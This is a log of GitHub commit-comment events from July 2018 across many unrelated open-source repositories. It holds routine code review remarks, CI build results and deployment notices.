{"id":"8017749995","type":"CommitCommentEvent","actor":{"login":"imurchie"},"repo":{"name":"appium/appium-base-driver"},"payload":{"comment":{"id":29831901,"position":6,"line":402,"path":"lib/jsonwp-proxy/proxy.js","commit_id":"39723f355876041c742813b0e53fb6d3cd7ec40f","created_at":"2018-07-25T16:52:03Z","updated_at":"2018-07-25T16:52:03Z","author_association":"MEMBER","body":"Yeah. I don't know what that code is trying to do, really."}},"created_at":"2018-07-25T16:52:03Z"}
{"id":"8017750877","type":"CommitCommentEvent","actor":{"login":"dahlstrom-g"},"repo":{"name":"JetBrains/android"},"payload":{"comment":{"id":29831906,"position":null,"line":null,"path":null,"commit_id":"d13332c17c124a731b41e57783c146b36eac15da","created_at":"2018-07-25T16:52:14Z","updated_at":"2018-07-25T16:52:14Z","author_association":"CONTRIBUTOR","body":"I see. On our side, commit c58d016 came in with a previous merge from 181, so in merging from 182 this has to be dropped."}},"created_at":"2018-07-25T16:52:14Z"}
{"id":"8017752006","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29831911,"position":8,"line":8,"path":"contracts/RemittanceLib.sol","commit_id":"86ac216cdbbcca925d2ea436dbfee39e580f3506","created_at":"2018-07-25T16:52:26Z","updated_at":"2018-07-25T16:52:26Z","author_association":"NONE","body":"Looks like duplicate code\r\n"}},"created_at":"2018-07-25T16:52:26Z"}
{"id":"8017754210","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29831916,"position":null,"line":null,"path":null,"commit_id":"215302f06db153bea96ce6f2e805e4774d4c189d","created_at":"2018-07-25T16:52:53Z","updated_at":"2018-07-25T16:52:53Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (lgu1234) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-215302f06db153bea96ce6f2e805e4774d4c189d-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-25T16:52:53Z"}
{"id":"8017755030","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":29831918,"position":null,"line":null,"path":null,"commit_id":"3e90efaf52b7eb0f1e4c2f0f4e9d9b6d7bdd3408","created_at":"2018-07-25T16:53:03Z","updated_at":"2018-07-25T16:53:03Z","author_association":"NONE","body":"TeamCity Chorus :: chorus-win32-2.6 Continuous [Build 2.6.522.f019b91b1e4cf8c88925accdf092fd589e295dcc](http://build.palaso.org/viewLog.html?buildId=125596&buildTypeId=bt2) outcome was **FAILURE**\nSummary: Compilation error: src\\LibChorus\\LibChorus.csproj Build time: 00:00:24"}},"created_at":"2018-07-25T16:53:03Z"}
{"id":"8017755094","type":"CommitCommentEvent","actor":{"login":"goodkov"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29831919,"position":null,"line":null,"path":null,"commit_id":"dc1be07940dda6ee1faa9db1bc6505da7a00dc2f","created_at":"2018-07-25T16:53:04Z","updated_at":"2018-07-25T16:53:04Z","author_association":"OWNER","body":"Not.\r\nDid someone(no my) start this  type Test?"}},"created_at":"2018-07-25T16:53:04Z"}
{"id":"8017756263","type":"CommitCommentEvent","actor":{"login":"AnnyAnualithe"},"repo":{"name":"AnnyAnualithe/ApplicableTax"},"payload":{"comment":{"id":29831924,"position":68,"line":68,"path":"src/taxcarculation/TaxCarculation.java","commit_id":"e7cacb63c55ef029bcd3a46de03dac817b7ccf51","created_at":"2018-07-25T16:53:17Z","updated_at":"2018-07-25T16:53:17Z","author_association":"OWNER","body":"vcvcv"}},"created_at":"2018-07-25T16:53:17Z"}
{"id":"8017757519","type":"CommitCommentEvent","actor":{"login":"rubycon"},"repo":{"name":"AmauriC/tarteaucitron.js"},"payload":{"comment":{"id":29831927,"position":null,"line":null,"path":null,"commit_id":"5956fcbbec482c1a2d2b76d57a600e5e1c26609d","created_at":"2018-07-25T16:53:31Z","updated_at":"2018-07-25T16:53:31Z","author_association":"NONE","body":"This commit is broken, there's two missing closing braces and the script doesn't load properly!"}},"created_at":"2018-07-25T16:53:31Z"}
{"id":"8017762922","type":"CommitCommentEvent","actor":{"login":"kraigb"},"repo":{"name":"Microsoft/vscode-docs"},"payload":{"comment":{"id":29831939,"position":null,"line":null,"path":null,"commit_id":"9207fa64f863cb39b0090102d1f7c3c55f704744","created_at":"2018-07-25T16:54:37Z","updated_at":"2018-07-25T16:54:37Z","author_association":"MEMBER","body":"OK, thanks for the clarification."}},"created_at":"2018-07-25T16:54:37Z"}
{"id":"8017768819","type":"CommitCommentEvent","actor":{"login":"Balandat"},"repo":{"name":"cornellius-gp/gpytorch"},"payload":{"comment":{"id":29831946,"position":5,"line":15,"path":"gpytorch/lazy/constant_mul_lazy_variable.py","commit_id":"149468cb6eb7bfe860c11396faf8ea47aa5f9bb7","created_at":"2018-07-25T16:55:45Z","updated_at":"2018-07-25T16:55:45Z","author_association":"COLLABORATOR","body":"Pardon my ignorance, but shouldn't this just be the dtype of the LazyVar to avoid other potential issues? Should LazyVariable define a dtype property for this? "}},"created_at":"2018-07-25T16:55:45Z"}
{"id":"8017769397","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29831949,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-25T16:55:52Z","updated_at":"2018-07-25T16:55:52Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-MacOS-10.9-clang: OK (2922 of 2924 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-25T16:55:52Z"}
{"id":"8017776157","type":"CommitCommentEvent","actor":{"login":"ryantrinkle"},"repo":{"name":"reflex-frp/reflex-platform"},"payload":{"comment":{"id":29831968,"position":null,"line":null,"path":null,"commit_id":"1bd98d48bf7d135b9810536dda17897acef0c94f","created_at":"2018-07-25T16:57:10Z","updated_at":"2018-07-25T16:57:10Z","author_association":"MEMBER","body":"Why did this get reverted?"}},"created_at":"2018-07-25T16:57:10Z"}
{"id":"8017779108","type":"CommitCommentEvent","actor":{"login":"mykola-mokhnach"},"repo":{"name":"appium/appium-base-driver"},"payload":{"comment":{"id":29831976,"position":6,"line":402,"path":"lib/jsonwp-proxy/proxy.js","commit_id":"39723f355876041c742813b0e53fb6d3cd7ec40f","created_at":"2018-07-25T16:57:44Z","updated_at":"2018-07-25T16:57:44Z","author_association":"CONTRIBUTOR","body":"it tries to filter out third-party errors (not inherited from ProtocolError/BadArgumentError) and cover them into Unknown error, so the client can receive a compatible response with error code"}},"created_at":"2018-07-25T16:57:44Z"}
{"id":"8017780972","type":"CommitCommentEvent","actor":{"login":"mykola-mokhnach"},"repo":{"name":"appium/appium-base-driver"},"payload":{"comment":{"id":29831982,"position":6,"line":402,"path":"lib/jsonwp-proxy/proxy.js","commit_id":"39723f355876041c742813b0e53fb6d3cd7ec40f","created_at":"2018-07-25T16:58:07Z","updated_at":"2018-07-25T16:58:07Z","author_association":"CONTRIBUTOR","body":"however it seems like the initial assumption here was not fully correct"}},"created_at":"2018-07-25T16:58:07Z"}
{"id":"8017783265","type":"CommitCommentEvent","actor":{"login":"jeffreyfjia"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29831989,"position":null,"line":null,"path":null,"commit_id":"18f9364ab0d4205d5fba8fe9df90a72a6433036b","created_at":"2018-07-25T16:58:34Z","updated_at":"2018-07-25T16:58:34Z","author_association":"NONE","body":"谢谢回复！1.5.82恢复出厂设置貌似会再自动安装更新到1.5.82. 不过我找了个旧版的rom用U盘刷回去了。"}},"created_at":"2018-07-25T16:58:34Z"}
{"id":"8017784733","type":"CommitCommentEvent","actor":{"login":"cr6git"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29831993,"position":null,"line":null,"path":null,"commit_id":"ad65f3c48a3db674f268264941b1a21f833b7dab","created_at":"2018-07-25T16:58:53Z","updated_at":"2018-07-25T16:58:53Z","author_association":"CONTRIBUTOR","body":":tada: "}},"created_at":"2018-07-25T16:58:53Z"}
{"id":"8017786328","type":"CommitCommentEvent","actor":{"login":"m-ke"},"repo":{"name":"m-ke/cre-dashboard"},"payload":{"comment":{"id":29831995,"position":7,"line":54,"path":"src/routes/OperatingStatement.vue","commit_id":"d512a04b58d1a4f2fcff313a03759bf59ea29689","created_at":"2018-07-25T16:59:13Z","updated_at":"2018-07-25T16:59:13Z","author_association":"OWNER","body":"@Sjefkesuit you removed the +/- buttons here, is that what you wanted to do?"}},"created_at":"2018-07-25T16:59:13Z"}
{"id":"8017787405","type":"CommitCommentEvent","actor":{"login":"ryantrinkle"},"repo":{"name":"reflex-frp/reflex-platform"},"payload":{"comment":{"id":29831999,"position":null,"line":null,"path":null,"commit_id":"1bd98d48bf7d135b9810536dda17897acef0c94f","created_at":"2018-07-25T16:59:25Z","updated_at":"2018-07-25T16:59:25Z","author_association":"MEMBER","body":"https://github.com/ghcjs/ghcjs/issues/666#issuecomment-407607792\r\n"}},"created_at":"2018-07-25T16:59:25Z"}
{"id":"8017790524","type":"CommitCommentEvent","actor":{"login":"cr6git"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29832006,"position":null,"line":null,"path":null,"commit_id":"4458dd14a17a2fe8a57160fad141be4013b639d4","created_at":"2018-07-25T17:00:03Z","updated_at":"2018-07-25T17:00:03Z","author_association":"CONTRIBUTOR","body":":tada: "}},"created_at":"2018-07-25T17:00:03Z"}
{"id":"8017790604","type":"CommitCommentEvent","actor":{"login":"enten"},"repo":{"name":"enten/angular-universal"},"payload":{"comment":{"id":29832008,"position":15,"line":47,"path":"src/main.ts","commit_id":"48385fd718c33700f09af4477a4823df36413a90","created_at":"2018-07-25T17:00:04Z","updated_at":"2018-07-25T17:00:04Z","author_association":"OWNER","body":"You're right again! To be honest:I didn't read that line (that's why I did not understand your comment).\r\n\r\nOutputting message when the app module has bootstrapped (or error when a rejection happened) isn't very useful.\r\n\r\nI wrote that lines to show how we can do something when angular application has bootstraped (or how we can handle error): that's why I didn't think to update log message.\r\n\r\nI fixed it on my local repository. It will figure into the next repository update. I don't know when the next update will happen. I want to update some dependencies which has evolved and broke something (like angular-devkit/build v0.7.0-rc.2)."}},"created_at":"2018-07-25T17:00:04Z"}
{"id":"8017795906","type":"CommitCommentEvent","actor":{"login":"cr6git"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29832022,"position":null,"line":null,"path":null,"commit_id":"00f2d4294040a8456f53e582b393650778254759","created_at":"2018-07-25T17:01:03Z","updated_at":"2018-07-25T17:01:03Z","author_association":"CONTRIBUTOR","body":":tada: "}},"created_at":"2018-07-25T17:01:03Z"}
{"id":"8017796158","type":"CommitCommentEvent","actor":{"login":"grimfang4"},"repo":{"name":"grimfang4/sdl-gpu"},"payload":{"comment":{"id":29832023,"position":null,"line":null,"path":null,"commit_id":"b4f0a8ee49cd62fcd43287cc8b2faf3f94d860fa","created_at":"2018-07-25T17:01:06Z","updated_at":"2018-07-25T17:01:06Z","author_association":"OWNER","body":"Got it."}},"created_at":"2018-07-25T17:01:06Z"}
{"id":"8017796348","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29832024,"position":null,"line":null,"path":null,"commit_id":"f69c97c4caf3cbcc94f7913f92a5173ae2837f1b","created_at":"2018-07-25T17:01:08Z","updated_at":"2018-07-25T17:01:08Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-383](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-383).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-383-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-25T17:01:08Z"}
{"id":"8017797643","type":"CommitCommentEvent","actor":{"login":"cr6git"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29832026,"position":null,"line":null,"path":null,"commit_id":"51bab04e42dfbce502547e51d30ce5b08fbc1ba2","created_at":"2018-07-25T17:01:23Z","updated_at":"2018-07-25T17:01:23Z","author_association":"CONTRIBUTOR","body":":tada: "}},"created_at":"2018-07-25T17:01:23Z"}
{"id":"8017799018","type":"CommitCommentEvent","actor":{"login":"arandomic"},"repo":{"name":"F0xxie/projectX"},"payload":{"comment":{"id":29832030,"position":32,"line":30,"path":"src/main/java/Main.java","commit_id":"ee1d31fb52c77639c979474e983de6a5218d30ca","created_at":"2018-07-25T17:01:40Z","updated_at":"2018-07-25T17:01:40Z","author_association":"CONTRIBUTOR","body":"Есть такая штука, как String::split.\r\nТы мог написать command.split(' ')"}},"created_at":"2018-07-25T17:01:40Z"}
{"id":"8017802609","type":"CommitCommentEvent","actor":{"login":"cr6git"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29832037,"position":null,"line":null,"path":null,"commit_id":"6da219ffb7ed65663769e88b3bd2cfc2b229bb84","created_at":"2018-07-25T17:02:22Z","updated_at":"2018-07-25T17:02:22Z","author_association":"CONTRIBUTOR","body":":tada: "}},"created_at":"2018-07-25T17:02:22Z"}
{"id":"8017803576","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29832040,"position":null,"line":null,"path":null,"commit_id":"c161c84dead1c4f4bd959c5ee02b54ceed5e22a4","created_at":"2018-07-25T17:02:33Z","updated_at":"2018-07-25T17:02:33Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-385](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-385).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-385-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-25T17:02:33Z"}
{"id":"8017803921","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29832042,"position":15,"line":15,"path":"contracts/RemittanceData.sol","commit_id":"86ac216cdbbcca925d2ea436dbfee39e580f3506","created_at":"2018-07-25T17:02:37Z","updated_at":"2018-07-25T17:02:37Z","author_association":"NONE","body":"Does it not do double duty with `RemittanceLib.RemittanceStorage`?"}},"created_at":"2018-07-25T17:02:37Z"}
{"id":"8017805696","type":"CommitCommentEvent","actor":{"login":"jacobrgardner"},"repo":{"name":"cornellius-gp/gpytorch"},"payload":{"comment":{"id":29832053,"position":5,"line":15,"path":"gpytorch/lazy/constant_mul_lazy_variable.py","commit_id":"149468cb6eb7bfe860c11396faf8ea47aa5f9bb7","created_at":"2018-07-25T17:03:00Z","updated_at":"2018-07-25T17:03:00Z","author_association":"MEMBER","body":"Yeah I agree this should be handled the same way as device. I'll open an issue for it, but the real bug fixed here was switching `Tensor` to `tensor`, which I don't understand:\r\n```python\r\nimport torch\r\n\r\nv1 = torch.randn(5).cuda()\r\nv2 = torch.tensor([1.], device=v1.device)\r\nv3 = torch.Tensor([1.], device=v1.device)\r\nprint(v1.device, v2.device, v3.device)\r\n```\r\nprints `cuda:0 cuda:0 cpu`\r\n"}},"created_at":"2018-07-25T17:03:00Z"}
{"id":"8017807009","type":"CommitCommentEvent","actor":{"login":"mbartle"},"repo":{"name":"mbartle/make_commits"},"payload":{"comment":{"id":29832057,"position":null,"line":null,"path":null,"commit_id":"f25eff6423d98431851f4f98cf7d234c7533e110","created_at":"2018-07-25T17:03:14Z","updated_at":"2018-07-25T17:03:14Z","author_association":"OWNER","body":"Omg me too."}},"created_at":"2018-07-25T17:03:14Z"}
{"id":"8017809591","type":"CommitCommentEvent","actor":{"login":"grimfang4"},"repo":{"name":"grimfang4/sdl-gpu"},"payload":{"comment":{"id":29832062,"position":null,"line":null,"path":null,"commit_id":"c638d981541d7142ee23b67b4949167628ebeb4d","created_at":"2018-07-25T17:03:45Z","updated_at":"2018-07-25T17:03:45Z","author_association":"OWNER","body":"This one should be fixed already, using `gpu_upload_modelviewprojection`."}},"created_at":"2018-07-25T17:03:45Z"}
{"id":"8017816783","type":"CommitCommentEvent","actor":{"login":"BharatheshAL"},"repo":{"name":"BharatheshAL/Programming-in-C"},"payload":{"comment":{"id":29832079,"position":10,"line":10,"path":"addition of 2 numbers","commit_id":"00cad689c135ddb2f8c631f6de8df2db92455cc4","created_at":"2018-07-25T17:05:14Z","updated_at":"2018-07-25T17:05:14Z","author_association":"OWNER","body":"Testing the revision history"}},"created_at":"2018-07-25T17:05:14Z"}
{"id":"8017819042","type":"CommitCommentEvent","actor":{"login":"MalloZup"},"repo":{"name":"openSUSE/salt-toaster"},"payload":{"comment":{"id":29832087,"position":5,"line":6,"path":".travis.yml","commit_id":"373cb48dc33b27bcba663eae67f83f76de1ca12e","created_at":"2018-07-25T17:05:42Z","updated_at":"2018-07-25T17:05:42Z","author_association":"CONTRIBUTOR","body":"@meaksh  :+1:  nice commits :1st_place_medal:  ( i was also thinking to fix it but i was doing other stuff :rofl: "}},"created_at":"2018-07-25T17:05:42Z"}
{"id":"8017819867","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29832089,"position":112,"line":90,"path":"src/hdskins/java/com/voxelmodpack/hdskins/skins/LegacySkinServer.java","commit_id":"c72120efd1c006f628adef44c7479f8610b814ac","created_at":"2018-07-25T17:05:52Z","updated_at":"2018-07-25T17:05:52Z","author_association":"MEMBER","body":"Moved. To AbstractSkinServer since they were common across every server implementation. Could also remove CallableFuture with this arrangement, but it remains for now until I decided on an approach to making skin previews async and/or consilidating this stuff in a class outside of GuiSkins."}},"created_at":"2018-07-25T17:05:52Z"}
{"id":"8017822923","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29832094,"position":null,"line":null,"path":null,"commit_id":"eb6f0415d81fbe00477d78b69640d88508870b9a","created_at":"2018-07-25T17:06:28Z","updated_at":"2018-07-25T17:06:28Z","author_association":"NONE","body":"Congratulations.\r\nJust one thing, the expression\r\nlmrDepth < 3 + ((ss - 1)->statScore > 0)\r\nIs hard to read, I suggest:\r\nlmrDepth < 3 + bool((ss - 1)->statScore > 0)"}},"created_at":"2018-07-25T17:06:28Z"}
{"id":"8017829957","type":"CommitCommentEvent","actor":{"login":"imurchie"},"repo":{"name":"appium/appium-base-driver"},"payload":{"comment":{"id":29832113,"position":6,"line":402,"path":"lib/jsonwp-proxy/proxy.js","commit_id":"39723f355876041c742813b0e53fb6d3cd7ec40f","created_at":"2018-07-25T17:07:55Z","updated_at":"2018-07-25T17:07:55Z","author_association":"MEMBER","body":"Yeah, seems like we need an isProtocolError function."}},"created_at":"2018-07-25T17:07:55Z"}
{"id":"8017830761","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29832116,"position":96,"line":122,"path":"src/hdskins/java/com/voxelmodpack/hdskins/skins/NetClient.java","commit_id":"c72120efd1c006f628adef44c7479f8610b814ac","created_at":"2018-07-25T17:08:05Z","updated_at":"2018-07-25T17:08:05Z","author_association":"MEMBER","body":"This was changed further down the line. Besides making the internal client static and keeping it around, this also became `IOUtils.consumeQuietly(response.getEntity())`.\r\n\r\nI don't know if that's fully necessary, though. It's there because other code seemed to be needing it."}},"created_at":"2018-07-25T17:08:05Z"}
{"id":"8017831136","type":"CommitCommentEvent","actor":{"login":"Br0wnf0x"},"repo":{"name":"Br0wnf0x/hello-world"},"payload":{"comment":{"id":29832118,"position":null,"line":null,"path":null,"commit_id":"c66ab08eb197da76ab224ad029a736ba91026ae0","created_at":"2018-07-25T17:08:09Z","updated_at":"2018-07-25T17:08:09Z","author_association":"OWNER","body":"Help me"}},"created_at":"2018-07-25T17:08:09Z"}
{"id":"8017832805","type":"CommitCommentEvent","actor":{"login":"jterrych"},"repo":{"name":"companieshouse/company-accounts.api.ch.gov.uk"},"payload":{"comment":{"id":29832122,"position":39,"line":39,"path":"src/main/java/uk/gov/companieshouse/api/accounts/util/logging/ControllerLoggingAspect.java","commit_id":"0165c35f06e0c810b3616cc0bdb9f39b2ca0a47b","created_at":"2018-07-25T17:08:28Z","updated_at":"2018-07-25T17:08:28Z","author_association":"NONE","body":"This has to return an Object for controller methods, otherwise the responsebody will be never be returned. Your response time and end request processing has to be done in a finally block"}},"created_at":"2018-07-25T17:08:28Z"}
{"id":"8017834054","type":"CommitCommentEvent","actor":{"login":"kiliak"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29832126,"position":null,"line":null,"path":null,"commit_id":"bbb653648512631ff3be29b7652fdad16479e97a","created_at":"2018-07-25T17:08:42Z","updated_at":"2018-07-25T17:08:42Z","author_association":"CONTRIBUTOR","body":"Bon je reprends mes fichiers de 0. Moi je traduisais simplement les TODO. Je n'ai pas vérifié  les anciennes trad, j...usqu'a que ça me saute aux yeux."}},"created_at":"2018-07-25T17:08:42Z"}
{"id":"8017834306","type":"CommitCommentEvent","actor":{"login":"Telix05"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29832129,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T17:08:46Z","updated_at":"2018-07-25T17:08:46Z","author_association":"NONE","body":"Great project "}},"created_at":"2018-07-25T17:08:46Z"}
{"id":"8017834541","type":"CommitCommentEvent","actor":{"login":"jterrych"},"repo":{"name":"companieshouse/company-accounts.api.ch.gov.uk"},"payload":{"comment":{"id":29832130,"position":46,"line":46,"path":"src/main/java/uk/gov/companieshouse/api/accounts/util/logging/ControllerLoggingAspect.java","commit_id":"0165c35f06e0c810b3616cc0bdb9f39b2ca0a47b","created_at":"2018-07-25T17:08:48Z","updated_at":"2018-07-25T17:08:48Z","author_association":"NONE","body":"this should be before joinPoint.proceed"}},"created_at":"2018-07-25T17:08:48Z"}
{"id":"8017836321","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29832133,"position":null,"line":null,"path":null,"commit_id":"091fab03cefff8c876a3a665cf123098d4d9b339","created_at":"2018-07-25T17:09:11Z","updated_at":"2018-07-25T17:09:11Z","author_association":"MEMBER","body":"😕\r\n\r\nAt least it's consistent with the main MineLP codebase!"}},"created_at":"2018-07-25T17:09:11Z"}
{"id":"8017836485","type":"CommitCommentEvent","actor":{"login":"imurchie"},"repo":{"name":"appium/appium-base-driver"},"payload":{"comment":{"id":29832135,"position":6,"line":402,"path":"lib/jsonwp-proxy/proxy.js","commit_id":"39723f355876041c742813b0e53fb6d3cd7ec40f","created_at":"2018-07-25T17:09:13Z","updated_at":"2018-07-25T17:09:13Z","author_association":"MEMBER","body":"Or an `isUnknownError` so we can be positive.\r\n"}},"created_at":"2018-07-25T17:09:13Z"}
{"id":"8017836584","type":"CommitCommentEvent","actor":{"login":"abicorios"},"repo":{"name":"sdrausty/TermuxArch"},"payload":{"comment":{"id":29832136,"position":null,"line":null,"path":null,"commit_id":"6c9c119c00c5601bd37c07a2e231c305d4966168","created_at":"2018-07-25T17:09:14Z","updated_at":"2018-07-25T17:09:14Z","author_association":"NONE","body":"I see it is mentioned x86. What about aarch64? "}},"created_at":"2018-07-25T17:09:14Z"}
{"id":"8017843567","type":"CommitCommentEvent","actor":{"login":"Balandat"},"repo":{"name":"cornellius-gp/gpytorch"},"payload":{"comment":{"id":29832151,"position":5,"line":15,"path":"gpytorch/lazy/constant_mul_lazy_variable.py","commit_id":"149468cb6eb7bfe860c11396faf8ea47aa5f9bb7","created_at":"2018-07-25T17:10:34Z","updated_at":"2018-07-25T17:10:34Z","author_association":"COLLABORATOR","body":"hmm interesting let me see if that happens on pytorch master, this looks like a bug"}},"created_at":"2018-07-25T17:10:34Z"}
{"id":"8017846372","type":"CommitCommentEvent","actor":{"login":"Zanidean"},"repo":{"name":"Zanidean/air"},"payload":{"comment":{"id":29832154,"position":null,"line":null,"path":null,"commit_id":"e5e39ff142512281d16d5f3adc810beb104dbd36","created_at":"2018-07-25T17:11:03Z","updated_at":"2018-07-25T17:11:03Z","author_association":"OWNER","body":"SIAMS username and password are hidden in a Load.R file, which also loads in `air` and `testthat`."}},"created_at":"2018-07-25T17:11:03Z"}
{"id":"8017849610","type":"CommitCommentEvent","actor":{"login":"blech75"},"repo":{"name":"apartmenttherapy/oxygen-lib-ui"},"payload":{"comment":{"id":29832164,"position":null,"line":null,"path":null,"commit_id":"041921d1cc7a07f082224b091d2b9a7f141a19cd","created_at":"2018-07-25T17:11:39Z","updated_at":"2018-07-25T17:11:39Z","author_association":"NONE","body":"@andrewb if anything, it might be good to denote what SHA this came from in the source repo.\r\n\r\nalso, this is one way to automate the process so we know _exactly_ what we're getting in this new repo:\r\n```\r\n[01:09 PM]-[9180]-[~/projects/oxygen]-[master ⚑14]\r\n$ git archive --format=tar 4151cc7 | (mkdir -p ../oxygen-lib-ui-test && cd ../oxygen-lib-ui-test && tar -xf - --strip=1 lib-ui)\r\n```"}},"created_at":"2018-07-25T17:11:39Z"}
{"id":"8017851335","type":"CommitCommentEvent","actor":{"login":"SelikemAB"},"repo":{"name":"SelikemAB/coursera-test"},"payload":{"comment":{"id":29832166,"position":null,"line":null,"path":null,"commit_id":"263caeeb467509e51575680119648b6a85fca37d","created_at":"2018-07-25T17:12:00Z","updated_at":"2018-07-25T17:12:00Z","author_association":"OWNER","body":"my first page\r\n"}},"created_at":"2018-07-25T17:12:00Z"}
{"id":"8017851594","type":"CommitCommentEvent","actor":{"login":"shailiej"},"repo":{"name":"marccampbell/help-center"},"payload":{"comment":{"id":29832168,"position":4,"line":4,"path":"content/docs/vendor-rbac/examples.md","commit_id":"54ece1d0a6046bb5bd806ed949e151b31b9e76a8","created_at":"2018-07-25T17:12:03Z","updated_at":"2018-07-25T17:12:03Z","author_association":"NONE","body":"Replicaed => Replicated"}},"created_at":"2018-07-25T17:12:03Z"}
{"id":"8017854202","type":"CommitCommentEvent","actor":{"login":"jims10d"},"repo":{"name":"jims10d/sportman-loopback"},"payload":{"comment":{"id":29832177,"position":null,"line":null,"path":null,"commit_id":"620d339db2a510a5597a16ecb3b55f89e79725ab","created_at":"2018-07-25T17:12:33Z","updated_at":"2018-07-25T17:12:33Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5a7e57bc-5410-437d-95a5-d427815f5ebc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/db4be768-68e6-447f-9187-7d1ee9f620cc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\") deployed [sportman-loopback](https://github.com/jims10d/sportman-loopback/releases/tag/deploy-ibm-yp-us-south-jims10d-simpleSpace-20180725-171232 \"deploy-ibm-yp-us-south-jims10d-simpleSpace-20180725-171232\") to [simpleSpace](https://console.bluemix.net/apps/12384bdb-7ac1-45d2-b63b-7d0a3532c568?env_id=ibm:yp:us-south \"ibm:yp:us-south:jims10d:simpleSpace\"), including this commit"}},"created_at":"2018-07-25T17:12:33Z"}
{"id":"8017854373","type":"CommitCommentEvent","actor":{"login":"arandomic"},"repo":{"name":"F0xxie/projectX"},"payload":{"comment":{"id":29832178,"position":42,"line":42,"path":"src/main/java/utils/MyDBController.java","commit_id":"ee1d31fb52c77639c979474e983de6a5218d30ca","created_at":"2018-07-25T17:12:35Z","updated_at":"2018-07-25T17:12:35Z","author_association":"CONTRIBUTOR","body":"У h2 можно заюзать фишку INIT=RUNSCRIPT FROM \r\nИ всё создание таблиц вынести в файл в ресурсах (init-base.ddl)"}},"created_at":"2018-07-25T17:12:35Z"}
{"id":"8017854487","type":"CommitCommentEvent","actor":{"login":"Ankit7839"},"repo":{"name":"chetanhere/100-days-of-code"},"payload":{"comment":{"id":29832179,"position":null,"line":null,"path":null,"commit_id":"51aaf8925ebb6100a14b18eaeda03d5e03840522","created_at":"2018-07-25T17:12:36Z","updated_at":"2018-07-25T17:12:36Z","author_association":"NONE","body":"+print(\"hello python\r\n"}},"created_at":"2018-07-25T17:12:36Z"}
